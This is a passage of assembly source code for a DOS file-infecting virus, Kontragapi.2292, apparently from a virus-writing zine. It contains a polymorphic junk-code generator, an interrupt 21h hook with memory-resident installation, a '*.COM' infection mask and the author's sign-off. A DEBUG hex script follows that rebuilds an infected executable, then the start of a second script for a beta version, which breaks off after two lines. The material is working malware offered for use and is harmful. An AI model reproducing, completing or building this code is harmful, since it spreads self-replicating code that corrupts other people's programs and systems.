CheckOperandCount: ; counts number of bytes to skip
mov al,ah
and al,0c7h
cmp al,6 ; direct addressed memory
je CkOpc3
and al,0c0h
jz CkOpc1 ; indirect memory no displacement
cmp al,0c0h ; all register operand
jne CkOpc2
CkOpc1: mov ax,2
ret
CkOpc2: cmp al,80h
jne CkOpc4
CkOpc3: mov ax,4 ; indirect memory 16-bit displacement
ret
CkOpc4: mov ax,3 ; indirect memory 8-bit displacement
ret
;=-=-=-=-=-=-=-=-=-=-[End of Tracer]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
;
ComFiles db '*.COM',0 ; search mask for infection
;
;=-=-=-=-=-=-=-=-=-=[Start of Padder]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CreatePad:
mov word ptr ds:Pad18+2,di
Pad01: mov ax,[bx+di] ; get a value to determine instructions
or bp,bp ; to be used as padding
js Pad07 ; note: bx=file handle
test al,1
jnz Pad02
test al,2
jnz Pad03
test al,4
jnz Pad09
test al,8
jnz Pad04
test al,10h
jnz Pad02
test al,20h
jnz Pad03
test al,40h
jnz Pad09
test al,80h
jnz Pad04
test ah,1
jnz Pad09
test ah,2
jnz Pad03
test ah,4
jnz Pad04
test ah,8
jz Pad06
Pad02: call MakeOpCode00_3D
jmp short Pad05
Pad03: call MakeOpCode80_83
jmp short Pad05
Pad04: call MakeOpCodeD0_D3
Pad05: mov ax,[bx+di]
Pad06: or bp,bp
jnz Pad08
Pad07: test ah,10h
jz Pad08
call MakeOpCodeA0_A1
jmp short Pad13
Pad08: test ah,20h
jnz Pad10
test ah,40h
jnz Pad12
test ah,80h
jz Pad14
Pad09: call MakeOpCode8A_8B
jmp short Pad13
Pad10: call MakeOpCode88_89
jmp short Pad13
Pad11: jmp Pad01
Pad12: call MakeOpCodeC6_C7
Pad13: mov ax,[di]
Pad14: test ax,1010h
jz Pad15
call MakeOpCodeB0_BF
Pad15: inc byte ptr ds:Pad16+1
Pad16: mov al,0
cmp al,7 ; what we would get here is actual-1
ja Pad17
and al,1
jnz Pad11
cbw
mov ds,ax
mov al,ds:Timer
push cs
pop ds
and al,3 ; check bit 0 and 1
jnz Pad11
Pad17: xor al,al
mov byte ptr ds:Pad16+1,al
Pad18: cmp di,'PK' ; did we create a pad?
je Pad10 ; no, then make one
ret
MakeOpcodeC6_C7: ;---------------------- mov reg, immediate
call SetUpRegs
or al,0c6h ; c6, c7
stosb
call ClearSpAx
shr al,3
or al,0c0h ; force register operand
stosb
or ch,ch
jmp short OpCod08
MakeOpcodeB0_BF: ;---------------------- mov reg,immediate
mov ax,[di]
and al,15
jz OpCod01 ; al?
cmp al,4 ; ah?
je OpCod01
cmp al,8 ; ax?
jne OpCod05
OpCod01:or bp,bp ; could we use ax?
jz OpCod06
OpCod02:mov al,ah ; if no, then use xchg ax,reg16
and al,15
OpCod03:cmp al,6 ; we need a value from 0 to 6 to get
jbe OpCod04 ; opcode for xchg ax,cx/dx/bx/bp/si/di
sub al,7
jmp OpCod03
OpCod04:cmp al,3 ; is it sp? we won't use that reg
je OpCod06 ; so we go back to mov
add al,91h
or bp,bp ; could we use ax? if no, do two xchg
jz OpCod18
stosb
jmp short OpCod18
OpCod05:cmp al,12 ; sp? then use xchg
je OpCod02
OpCod06:or al,0b0h
stosb
and al,8 ; 16-bit register?
jmp short OpCod08
MakeOpcodeA0_A1: ;---------------------- mov ax/al,mem
call SetUpRegs
or al,0a0h
stosb
jmp short OpCod15a
MakeOpcode00_3D: ;---- add/adc/sub/sbb/and/or/xor/cmp ax/al,immediate
mov ax,[di] ;---- add/adc/sub/sbb/and/or/xor/cmp reg,reg/mem
push ax
and ax,130h ; get random value for reg size and opcode
xchg ax,cx
pop ax
or bp,bp ; could we use ax?
jnz OpCod11
and al,14 ; add/adc/sub/sbb/and/or/xor/cmp ax/al,immediate
cmp al,12 ; 0c,0d,1c,1d,2c,2d,3c,3d
je OpCod07
cmp al,4 ; 04,05,14,15,24,25,34,35
jne OpCod11
OpCod07:or al,ch
or al,cl
stosb
test al,1
OpCod08:jz OpCod10
OpCod09:inc di
OpCod10:inc di
ret
OpCod11:and al,10 ; add/adc/sub/sbb/and/or/xor/cmp reg,reg/mem
jz OpCod12 ; 02,03,12,13,22,23,32,33
cmp al,8
jne OpCod13 ; 0a,0b,1a,1b,2a,2b,3a,3b
OpCod12:add al,2
OpCod13:or al,ch
or al,cl
OpCod14:stosb
call ClearSpAx
mov al,ah
and al,0c7h
cmp al,6 ; directly addressed memory operand?
jne OpCod16
OpCod15:or al,cl
stosb
OpCod15a:test ch,1 ; 16-bit or 8-bit reg
jz OpCod09
mov ax,[di] ;check for mov reg16,[ffff] and
cmp ax,-1 ;add/adc/sub/sbb/and/or/xor/cmp/mov reg16,[PtrReg16-1]
jne OpCod09 ;PtrReg16 (bx,bp,si,di) assumed to be zero? inay ko!!!
dec ax ;not always true but would be in some cases!
stosw ;otherwise, it's hang time folks!
ret
OpCod16:and ah,7
or cl,ah
and al,0c0h ; isolate mod bits
jnz OpCod19
OpCod17:or al,cl ; indirect memory no displacement
OpCod18:stosb
ret
OpCod19:cmp al,0c0h ; operands all registers?
je OpCod17
cmp al,40h ; displacement 8-bit or 16-bit?
jne OpCod15
or al,cl
stosb
OpCod20:test ch,1 ; 16-bit reg?
jz Opcod10
mov al,[di] ; create an 8-bit displacement
cmp al,-1 ; we might get offset ffff if PtrReg16 is 0
jne Opcod10
dec ax
stosb
ret
MakeOpcode80_83: ;---------- add/adc/sub/sbb/and/or/xor/cmp reg,immediate
mov ax,[di]
and al,3 ; randomize opcode 80,81,82,83
mov ch,al
or al,80h
stosb
call ClearSpAx
mov al,ah
and al,0f8h
or al,0c0h ; force register operand
shr cl,3 ; set reg field
or al,cl
stosb
test ch,1 ; is opcode 16 bit?
jz Opcod10
cmp ch,3 ; is immediate operand 8 bit?
je Opcod20
jmp Opcod09
MakeOpcode8A_8B: ;---------------------- mov reg,reg/mem
call SetUpRegs
or al,8ah
jmp OpCod14
SavedHost db '100' ; saved host program code
MakeOpcode88_89: ;---------------------- mov reg16/reg8,reg16/reg8
call SetUpRegs
or al,88h ; set operand 88 or 89
stosb
call ClearSpAx
mov al,ah
and al,7
jz OpCod21
cmp al,4
jne OpCod23
or ch,ch
jnz OpCod22
OpCod21:or bp,bp
jz OpCod23
OpCod22:inc ax
OpCod23:or al,cl ; set reg field
or al,0c0h ; force register operand
stosb
ret
MakeOpcodeD0_D3: ;------------------ rol/ror/rcl/rcr/shl/shr/sar cl/1
mov ax,[di]
and al,3 ; randomize opcode - d0,d1,d2,d3
mov ch,al
call ClearSpAx
mov cl,3
shr al,cl ; set register
and ah,7
cmp ah,6 ; reg field 6 is said to be shl but
jne OpCod24 ; will skip it to avoid problems
dec ah ; anyhows, we already have a shl
OpCod24:shl ah,cl
or al,0c0h ; force register operands
or ah,al
mov al,0d0h
or al,ch
cmp ch,1 ; second operand cl? if not do it twice
ja OpCod25 ; d0-d1 = 1, d2-d3 = cl
stosw
OpCod25:stosw
ret
SetUpRegs: ; randomizes opcodes
mov ax,[di]
and al,1 ; would it be 16-bit or 8-bit reg?
mov ch,al ; nothing really to this
ret ; i only wanted to make jumps short
ClearSpAx:
mov al,ah
mov cl,3 ; isolate reg field
shr al,cl
and al,7
jz SpAx1 ; if zero, reg is ax or al
cmp al,4 ; if 4, reg is sp or ah
jne SpAx3
test ch,1 ; is it 16 bit reg?
jnz SpAx2 ; if yes, reg = sp
SpAx1: or bp,bp ; is it safe to use ax?
jz SpAx3 ; yes = 0; no <> 0; signed = yes but ignored
SpAx2: inc ax
SpAx3: shl al,cl ; set reg field
mov cl,al ; and save
ret
;=-=-=-=-=-=-=-=-=-=-[End of Padder]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Init: mov sp,-2
mov dx,1898h ; check memory resident id
push cs
pop ds
mov ah,2ah
int 21h
cld
push cs ; to be sure that we have the right segments
pop es ; I hope, else its hang time folks
Init1: mov si,-1234
mov cx,100h
cmp dx,1998h ; already memory resident?
je Init2
mov di,cx
mov cx,offset ExecParam
repe movsb
mov di,21h*4
mov ax,es
add ax,16
push ax
push offset Init4
retf
Init2: mov ax,0 ; execute host from
Init3: mov di,0 ; saved host code
add si,offset SavedHost
add di,cx
movsb
movsw
add ax,cx
jmp ax ; execute host program
Init4: push es
mov ah,4ah
mov bx,MemoryRequired ; release excess mem
int 21h
xor ax,ax
mov ds,ax
les ax,dword ptr [di] ; get int 21
mov bx,offset isDos
mov [di],bx ; hook int 21
mov [di+2],cs
push cs
pop ds
mov word ptr ds:Dos04+1,ax ; save int 21
mov word ptr ds:Dos03+1,es
pop bp
mov ds,bp
push cs
pop es
mov di,offset ExecParam ; set up exec parameter
mov bx,di
mov ax,ds:Environment
push ax
stosw
mov ax,80h
stosw
xchg bp,ax
stosw
xchg bp,ax
sub al,(80h-5ch)
stosw
xchg bp,ax
stosw
xchg bp,ax
add al,(6ch-5ch)
stosw
xchg bp,ax
stosw
pop dx
mov ax,dx
xor di,di
dec ax
mov es,ax
mov cx,es:[di+3] ; length of environment
shl cx,4
mov es,dx
mov ax,di
Init5: repne scasb ; find host file name
jne Init6
scasb
jne Init5
scasw
push es
pop ds
push cs
pop es
mov dx,di
mov ax,4b00h ; execute host
call UseDos
mov ax,cs
mov ss,ax
mov sp,offset FirstGeneration
mov ah,4dh
call UseDos ; get return code
Init6: push ax ; and save
push cs
pop ds
mov ax,ds:ExecParam ; release environment
mov es,ax
mov ah,49h
call UseDos
pop ax ; retrieve return code
mov dx,MemoryRequired
mov ah,31h ; tsr!!!!!
int 21h
;---------------------------------------------------------------------
; ExecParam should always be on even address. If these falls on an
; odd offset, remove/add 1ah (26) after "$" in "kontragapi" or make
; adjustment in the codes. It would only be a waste if you use NOP.
; If modifying, try, as much as possible, to even align labels reached
; only through branching. The virus code is slow and that would help.
;---------------------------------------------------------------------
even ; check if nop is generated here
ExecParam dw 1b1ah ; saved environment segment
VirusDta db 43 dup (1)
db ? ; to even align the data
;---------------------------------------------------------------------
; Virus length should only be up to ExecParam but because I could not
; do a successful decryption unless I have an extra 2 bytes. This is
; the reason why virus length is VirusDta (or ExecParam+2)
;---------------------------------------------------------------------
EncryptBuffer db ((offset VirusDta)-offset ThisIsKontragapi) dup (2)
ReadBuffer db 512 dup (4) ; the decryptor would be less
db 512 dup (3) ; than 1 kb but to be sure we
db 512 dup (5) ; are going to set aside 1.5 kb
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; The next two lines would paragraph align FirstGeneration. It would have
; been easier to use "align 16" but a86 does not recognize align. If your
; compiler generates an error on ParaAlign ["Positive count needed" in
; tasm and "Illegal value for DUP count" in masm] means that
; FirstGeneration is already paragraph aligned. In such case, you would
; have to comment out ParaAlign.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
CurentPos equ ($-ThisIsKontragapi)
ParaAlign db ((((CurentPos+15)/16)*16)-CurentPos) dup (7)
FirstGeneration: ; exes are not infected by
mov ax,cs ; infected by Kontragapi
mov ss,ax
mov sp,offset FirstGeneration
mov ds,ax
mov ah,2ah
mov dx,1898h ; memory self rec
int 21h
cmp dx,1998h
jne PersGen
mov ax,4CFFh ; if resident --> terminate
int 21h
even
PersGen:mov bp,es
mov ax,3521h
int 21h ; save old int 21
mov word ptr ds:Dos04+1,bx
mov word ptr ds:Dos03+1,es
mov dx,offset isDos ; hook int 21
mov ax,2521h
int 21h
mov es,bp
mov ax,es:Environment ; release environment segment
mov es,ax
mov ah,49h
int 21h
mov es,bp
mov dx,MemoryRequired ; tsr
mov ax,3100h
int 21h
;
; This would paragraph align the program so that when I press the End
; key when using the hex viewer of Norton Commander, I wouldn't get
; confused by the shifted offsets.
;
; You could remove these two lines, if that's what you want. Error
; messages regarding ParaAlign also applies to ParaAlignX.
;
CurentPosX equ($-ThisIsKontragapi)
ParaAlignX db ((((CurentPosX+15)/16)*16)-CurentPosX) dup ('x')
kontragapi ends
end FirstGeneration
;
;
; I might do an exe implementation, if not exe/com, of this virus
; if I could find the time. It's back to school time (and being stuck
; on a traffic jam) here folks so I will try to squeeze some time to
; write viruses. I am trying hard to finish my studies so that I can join
; the hundreds of thousands, if not millions, of unemployed Filipinos.
;
; One other chance to write a virus, is when typhoon season starts.
; Although the Philippines badly needs a big downpour, a strong typhoon
; is not welcome. Rain, rain, rain.... We need water. In our place our
; taps are dry. Water comes only about 30 minutes a week and... I need
; to take a bath. :)
;
; It's raining outside. Would I dare romp in acid rain or would I let
; myself stink to death? :)
;
; I hope you like this little big virus of mine....
; ....notwithstanding its defects....
;
; Putoksa Kawayan
;
ÄÄ KNTRAGAP.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This debug script contains a file infected by the virus compiled from the
source code listed above. TASM 2.01 was used in compiling the source code.
ÄÄ KGAP2292.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N KGAP2292.COM
F 02E0 0E2F 64
E 0100 E9 CF 01 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79
E 0110 21 0D 0A 0A 54 68 69 73 20 69 73 20 4B 6F 6E 74
E 0120 72 61 67 61 70 69 2E 32 32 39 32 20 76 69 72 75
E 0130 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20
E 0140 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70
E 0150 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20 74
E 0160 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45
E 0170 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 33 0D 0A 0A
E 0180 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75
E 0190 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72
E 01A0 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C
E 01B0 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D
E 01C0 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69 6D
E 01D0 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 61
E 01E0 72 69 73 69 6E 67 20 64 69 72 65 63 74 6C 79 20
E 01F0 6F 72 20 69 6E 64 69 72 65 63 74 6C 79 20 66 72
E 0200 6F 6D 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75
E 0210 73 65 0D 0A 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F
E 0220 66 20 74 68 69 73 20 70 72 6F 67 72 61 6D 2E 20
E 0230 54 68 65 20 70 65 72 73 6F 6E 20 77 68 6F 20 65
E 0240 78 65 63 75 74 65 73 20 74 68 69 73 20 70 72 6F
E 0250 67 72 61 6D 20 62 65 61 72 73 20 66 75 6C 6C 0D
E 0260 0A 72 65 73 70 6F 6E 73 69 62 69 6C 69 74 79 20
E 0270 66 6F 72 20 68 69 73 2F 68 65 72 20 61 63 74 69
E 0280 6F 6E 73 2E 0D 0A 0A 54 68 69 73 20 70 72 6F 67
E 0290 72 61 6D 20 69 73 20 73 74 72 69 63 74 6C 79 20
E 02A0 66 6F 72 20 65 64 75 63 61 74 69 6F 6E 61 6C 20
E 02B0 6F 72 20 72 65 73 65 61 72 63 68 20 70 75 72 70
E 02C0 6F 73 65 73 20 6F 6E 6C 79 2E 0D 0A 0A 0A 24 08
E 02D0 20 1A 0E 1F BA 07 01 B4 09 E9 E8 0A C0 75 00 B4
E 02E0 4C CD 21
E 04D2 BC 15 D6 11 E2 6F 49 73 50 77 3F 6C 41 75
E 04E0 4B 12 EE 28 00 38 A8 93 C2 A5 58 09 12 06 64 0C
E 04F0 4C 13 13 B9 FF D1 19 B9 46 D2 1D C1 D0 09 58 99
E 0500 2D E5 98 55 87 01 CC 12 69 BD 30 3A F6 7C 13 0B
E 0510 65 B9 39 BF 47 06 68 ED 86 08 2A 0C 1D ED 7F B9
E 0520 51 ED 86 08 2C 58 36 24 29 ED 8C 23 34 23 37 41
E 0530 9E 79 36 90 28 92 15 EE 1E 05 24 D1 3D EE 81 08
E 0540 CD DB D2 E2 2E 56 4B 77 97 13 6B 57 36 6A 53 79
E 0550 96 C4 72 05 59 03 E3 E4 18 0F 60 B2 97 0A D4 51
E 0560 0F 3F 69 79 AD 90 6C 3E 6F 79 AD BD 9C 05 B7 3D
E 0570 77 79 78 3D 9B 7A 6F B3 B3 4A 7A 7A AD 38 49 91
E 0580 7D B2 8E C5 FA 14 12 CE 36 B4 00 12 C6 32 05 FF
E 0590 DB 08 85 F1 80 5E 83 34 EA 56 F2 5C E7 79 AA B1
E 05A0 50 7A 9D 65 04 5F 00 F1 8A 89 70 0E 08 94 8D EE
E 05B0 7A 08 26 18 9E 21 BB 77 C7 13 DB 38 90 BF E9 05
E 05C0 AA AC C6 ED 90 08 20 60 E9 ED 86 08 28 25 B8 B9
E 05D0 D4 0C F3 66 C1 22 74 56 64 CA 18 1F 52 40 1C 30
E 05E0 56 1D 20 43 5A 35 24 49 5E 31 28 5C 62 2D 2C 51
E 05F0 66 29 4C 34 99 46 F9 F0 0A 87 F6 9E 16 7B 19 04
E 0600 C8 5E A1 B6 06 D5 A4 F1 F4 BE 1D 06 5E BE 08 47
E 0610 62 BE FC 46 E5 EF 2A 05 7A 24 22 EE 1E 05 2E 0D
E 0620 AD CA 51 0E 26 91 10 9B 7A 38 FE 8E 84 0D E4 3C
E 0630 1A 5A 36 FD 19 FE 19 12 0C 7C 41 43 32 15 B2
E 0640 2A 45 46 EE 94 08 BA 5C 32 6F 4E 7A 9A 91 94 24
E 0650 8B 4A 7A 7B 5D 91 9C 26 94 CA D0 43 E9 4A 7A 8F
E 0660 A8 08 A1 12 57 7A 9A EE 08 05 F9 5A 8C EE 7A 08
E 0670 E4 1C 5C 64 78 78 81 EE B2 06 64 1A 80 93 D4 24
E 0680 B4 F3 0E 53 9B EE 7C 08 E2 60 AB EE 86 08 9E 25
E 0690 42 07 1A 4D 9D 10 58 7B 9F EE 9E 08 11 B1 F8 91
E 06A0 82 61 C3 EE 84 08 AF 25 0B F0 F2 05 AF 2F E1 09
E 06B0 DD 39 E7 C6 3E 4D BE 8F 00 0B 45 4D BE A9 19 0F
E 06C0 0A 4F 67 31 CE EE A2 08 05 C8 41 14 4F 45 E4 18
E 06D0 1F 61 48 0C BE 20 DA 79 E0 CC 22 0E 42 00 A3 92
E 06E0 A8 34 F8 18 66 85 EE 06 5F 0C 29 0F EE 7C DA 0A
E 06F0 38 0B 97 63 FE 98 E0 BA FB 97 87 DD BD BE 07 AC
E 0700 A6 92 FE B7 EF B1 93 4D 0C 92 FC 05 D2 AA 49 0F
E 0710 B5 31 14 57 AC 32 D9 0C 09 10 C7 C0 21 07 08 73
E 0720 23 61 E3 E1 27 3A 1E 96 08 A9 98 0B 52 0E 6C 0C
E 0730 A8 0F BE CB 5A 0E 74 0C B1 F6 D4 15 5D 0A 38 99
E 0740 CC 0C C4 00 48 7D 4C BB 2A F3 4E BB 12 AB 7E 07
E 0750 D2 00 57 7A 59 8A 1F 0B DA 00 61 7B 72 87 59 0A
E 0760 D6 14 E4 00 69 7B 6C 11 33 7D 6F 4E 59 09 BF 91
E 0770 77 A9 30 0A 61 08 03 CA 39 28 85 C0 F7 0B 83 C8
E 0780 85 C8 27 3C 86 5C DF 59 47 0A 8C 0A 63 B5 93 C9
E 0790 3D 51 09 FF F0 05 66 F0 AC 08 5A 31 9E 3A 8D 5F
E 07A0 2D DF 8C 53 A9 EF F0 0A 4E AD 94 4B B1 92 77 33
E 07B0 74 45 E6 07 28 FC DD 05 B9 09 C2 3B BE 5E 64 4D
E 07C0 AA 35 C7 AB AE 31 CB AC B2 2D CF AB B6 29 D3 AB
E 07D0 1F F0 F0 0A 60 0D FC 0E 16 0C 51 09 1E 14 38 B2
E 07E0 CA 15 E7 AC 8B 55 D0 0F ED 4C 45 59 79 CF 1B C9
E 07F0 FC EB 69 1B 32 85 6F 17 FE 09 F2 E0 88 E8 B0 7D
E 0800 AD F0 F0 0A 5E F3 50 93 01 B8 F4 EB 10 B8 F9 B2
E 0810 6C 93 DB 33 D8 48 58 FF F2 B3 A7 DF 06 DA 22 93
E 0820 E9 33 EA 44 77 7E 48 93 EC 33 F2 61 85 34 32 92
E 0830 12 B9 A8 91 3A 93 32 B9 23 B3 C7 CF 69 C9 45 D3
E 0840 42 FF 1C B4 A5 F3 5E 34 4C 92 2C B9 C2 91 54 B8
E 0850 3B B3 AD 93 1D 34 19 0E 25 09 53 E1 09 F1 F0 0A
E 0860 4A 96 66 62 C3 93 37 34 34 F1 8C 08 2C FD 78 93
E 0870 C6 20 FF 54 8C C0 79 5F 65 15 AF D1 36 0A C3 F3
E 0880 87 C2 78 11 3A 23 24 17 72 84 89 CC 42 49 7B FF
E 0890 46 47 7F FB 50 21 9E C1 C1 08 50 57 89 F1 54 58
E 08A0 8D ED 58 48 5F 09 AA C2 BE 1A 97 E3 E1 D1 68 09
E 08B0 F4 F3 87 C7 AA 11 42 5D D2 92 00 1F 48 D1 76 28
E 08C0 E4 DE E6 D6 10 43 92 7D D2 2C AC 13 90 91 14 1F
E 08D0 14 CC 8C 0B 13 F1 86 08 65 E1 9F 4F 0B 5D 22 4A
E 08E0 38 0C 3A 52 38 0D 3B 4C 2B 57 F0 53 37 55 3C 09
E 08F0 7D FB F7 D8 40 53 83 0D 36 F4 71 1D 88 CD 98 F4
E 0900 22 59 79 7D 75 74 7B 6A 2A 54 6D 80 6F 82 71 77
E 0910 4E F2 88 12 52 F1 8D 79 9D 37 46 11 20 94 64 0A
E 0920 62 49 64 7D 40 94 7E 0D 2D D9 14 89 2D 93 76 0D
E 0930 D5 62 3C F1 A2 08 AA 11 C2 77 42 44 FF 7D F1 02
E 0940 05 0D 0A 95 36 37 5C 1B BC 0D 87 FB C0 26 DB 5F
E 0950 56 0C 24 F2 AC 08 E1 4F 5E 92 AA 09 46 4D 5F 7C
E 0960 41 15 24 7E 40 95 5A 0D 3A 54 B6 94 72 45 5B 7F
E 0970 77 93 38 A2 61 16 B4 F2 EE 0D B8 F1 F3 13 0B 4E
E 0980 83 49 C4 49 FA C2 73 C3 49 EB 91 C2 A5 09 82 B8
E 0990 07 0F 4C 0B 96 F4 42 46 D7 80 BA 45 AD 7D 41 5A
E 09A0 C6 15 E0 15 1A 0C E4 0D 02 7F B5 2D AF 7D 74 C2
E 09B0 B5 09 9F 97 9E 1D B9 F4 42 46 FC 7B 2A 46 21 80
E 09C0 93 46 44 7C 2A 46 4B 81 D7 59 B4 07 CE 62 53 EB
E 09D0 D5 52 48 B8 C1 B7 14 92 4C 59 18 98 54 E0 1C 9A
E 09E0 54 51 20 A3 5C B6 24 AA 5C 49 28 AD 64 CB 2C B2
E 09F1 41 30 B3 6C BF 34 BA 6C 39 38 C9 75 1C 3C BE
E 0A00 76 0E 40 C2 7B 0D 91 80 0A 2E 14 7F B0 F3 73 09
E 0A10 08 CF 4C 7F 1E 46 DE 7C 2A 46 E3 80 CA 46 ED 7E
E 0A20 2C 46 F4 7C 2A 46 FB 80 B5 02 EF 94 F2 46 40 7E
E 0A30 AE 46 45 7E AE 46 4A 7E AE 46 52 7E AE 46 5A 7E
E 0A40 AE 46 64 7E AC 46 6F 7E AC 46 6D 7F 2A 96 CE 0A
E 0A50 5D 09 C8 DF E0 0F E3 D8 85 D9 DF 03 6D 81 2A 47
E 0A60 16 7F 65 51 AD 94 6D 46 B6 7E AC 46 9F 7E AC 46
E 0A70 7B 7E AD 46 84 7E AD 46 89 7E AD 46 94 7E AD 46
E 0A80 9C 7E AD 46 AB 7E AD 46 B8 7E AD 46 C1 7E AD 46
E 0A90 CD 7E AD 46 D2 7E AD 46 D7 7E AD 46 E1 7E AD 46
E 0AA0 EA 7E AD 46 12 7F AD 14 6A 80 AE 03 71 C3 B2 0A
E 0AB0 9B 99 B2 11 BD 18 CE 21 D8 29 E2 31 EC 39 F6 41
E 0AC0 00 A7 61 00 BE 04 C2 06 C6 08 56 CF F2 D1 0C 11
E 0AD0 46 1B F8 CA 4A 0F 14 CB 4F 0F 94 0D DE CD 1C 8B
E 0AE0 57 0F 9C 0F E6 CD A0 0E EA CD 16 39 31 5A 3D 0B
E 0AF0 7B 49 B6 11 81 0C 03 F8 72 52 A4 0C 73 3B A8 0D
E 0B00 77 3C AC 0F 7B 5F B0 13 7F 39 B4 1B 83 2B B8 2B
E 0B10 87 2C BC 4B 8B 4F C0 8B 8F 29 12 D0 1F 80 5B 01
E 0B20 E6 0D 99 1A 1C D0 2C 80 39 01 F0 13 A2 1A 18 C5
E 0B30 32 F6 3C F3 5E 0C 23 0F 22 7F 3D 96 3F 16 2D 81
E 0B40 4C 01 08 1C BA 10 30 A5 4A F6 6A 01 12 2C C5 1A
E 0B50 48 D0 94 80 67 01 1C 8C CE 1C 44 31 5F F6 6A F3
E 0B60 8C 0C 4F 11 51 9A 50 3C 6A 96 71 B4 7E 1B E4 0E
E 0B70 5A 45 74 09 7C B1 7E BB 7A 47 83 82 8E 2F 81 80
E 0B80 65 A4 12 E4 26 78 8C 19 A9 2F 8F 80 65 3E 50 AE
E 0B90 38 12 15 0B C4 1F 0C D3 5D F4 D7 0C AA D1 4A F4
E 0BA0 DE 0C 64 F4 A9 17 68 B6 B4 F8 97 67 39 11 D4 1A
E 0BB0 26 14 F0 0F 2A 10 F4 13 2F 29 C7 F8 32 29 4A D0
E 0BC0 E6 1A 00 12 3C 10 F4 12 B5 04 08 0F 42 19 D4 9C
E 0BD0 DD F8 48 7B 80 F7 44 48 E6 7F BF 18 8E B6 04 14
E 0BE0 CD 31 CC FE E6 17 88 B6 D5 4B 77 11 3E 31 20 0D
E 0BF0 83 64 FF F8 6B 22 1C 1A 36 18 70 10 3A 10 75 18
E 0C00 0C D1 0E CD B0 B4 09 80 0B 53 53 CF 32 16 84 10
E 0C10 4E 14 89 0E 1A 0E 22 D1 24 CD C6 F4 DE 0C AA D0
E 0C20 46 D3 60 12 9B 1E 32 CD D4 02 F1 0D A2 E7 BB 11
E 0C30 6F 0B 33 82 0A 55 E3 CF BA F0 43 16 0A 31 00 82
E 0C40 46 16 05 B7 09 49 08 81 42 49 8C 81 27 17 11 B7
E 0C50 48 D2 55 80 0B 97 5D 48 59 82 0B 55 08 D0 EB 11
E 0C60 86 0F EE F4 72 8C 12 F5 DE 0C F6 D0 92 04 7C CC
E 0C70 32 F6 77 16 37 B7 6E D2 7B 80 0B 8D 7B 10 F4 DC
E 0C80 6D 94 6C 5F 86 18 12 F8 1B DA AD 16 76 55 90 18
E 0C90 1A B7 7C 56 96 96 5C 31 A1 80 A4 48 A2 81 A9 16
E 0CA0 8F 82 A8 17 93 81 A9 4C B4 CD B8 CC 58 D0 3B 12
E 0CB0 D6 0F 3E F5 9E 34 B8 BD BD DE A4 8D A2 14 40 09
E 0CC0 C8 81 C6 0A 92 DF AC 19 8A 17 AC BD 9E 17 95 8D
E 0CD0 CF 0E 4B 0E 81 B8 9B 98 DF 30 DD 96 C6 D0 6A D1
E 0CE0 93 10 B6 F5 0A 14 5C 16 26 11 61 17 E4 D2 F1 81
E 0CF0 F6 17 E1 81 F7 4C CA ED 84 D5 BF C9 FC 0C BA A5
E 0D00 1A 1B 23 C1 30 DA 29 09 18 14 CA DF 12 C6 10 0E
E 0D10 93 07 AC 26 8A 21 A3 06 D3 FF 24 00 C2 CC A4 0D
E 0D20 AE CD 29 1D 26 5D 90 77 32 D8 E4 DF 2F CC 09 0F
E 0D30 B3 D3 EB 14 39 06 DC B2 3D CE 3B EE 44 C1 8A C8
E 0D40 D4 0E 11 2F 79 CD D6 E5 0E 13 07 12 4F 96 6D 99
E 0D50 9F 0F 62 2C F9 49 59 99 60 45 5D 6A EC EA 6E 14
E 0D60 21 00 6C 98 45 AF 94 0D BA B8 24 8E 6E B8 05 B9
E 0D70 07 3A 98 B8 0B B9 0D 12 8A B8 11 B9 D8 98 42 41
E 0D80 81 56 12 CE AC 98 D5 10 4B EF 90 9B 50 99 57 00
E 0D90 40 83 B0 BB 0B 07 47 14 B9 1B A3 98 75 C6 A0 58
E 0DA0 8A F1 9E 9A 6E 9C 78 CA CA 25 60 5B 96 E5 AA 5E
E 0DB0 C0 2C 55 00 BE 9B 78 C2 03 F6 86 08 16 C8 52 0F
E 0DC0 76 3F 91 2F 02 02 BE 1F BA D3 C8 A0 09 E9 BC D2
E 0DD0 04 34 00 88 CC 8B 29 8A 64 64 8A 64 64 8A
E 0DE0 8A 64 64 8A 64 64 8A 64 64 8A 64 64 8A 64 64 8A
E 0DF2 8A 64 64 8A 64 64 58 8A 6C 64 94 8A 6C
E 0E00 2B E0 8A 6C 64 94 8A 6C 64 50 8A 64 64 5D 8A
E 0E11 81 FC F8 0D 88 ED 75 DF 8A 64 64 E9 DC FE 8A
E 0E22 8A
RCX
0D25
W
Q
ÄÄ KGAP2292.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is the virus that was released as beta version.
ÄÄ KGAP2274.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N KGAP2274.COM
F 02E0 0E1F 64
